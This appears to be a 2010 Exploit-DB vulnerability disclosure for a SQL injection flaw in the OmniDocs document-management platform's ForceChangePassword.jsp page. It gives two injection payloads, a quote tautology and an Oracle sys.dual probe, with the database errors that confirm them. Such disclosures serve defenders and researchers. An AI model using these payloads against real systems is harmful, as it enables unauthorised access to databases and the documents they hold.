Omnidocs - SQL Injection

EDB-ID:

11393




Platform:

JSP

Date:

2010-02-11


--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA

---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
By       :Thebluegenius. 
Email    :rajsm@isac.org.in
Blog	 :thebluegenius.com.
---------------------------------------------------

Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications.

------------------
Vulnerability
------------------

Affected URL: http://server/omnidocs/ForceChangePassword.jsp

Command: ' or 'a' = 'a'
Confirmed SQL Injection error :  ORA-00907: missing right parenthesis           

Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated           

-----------------------------------------------------
Greetz Fly Out to:
1] Amforked()  : My good friend
2] Aodrulez    : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in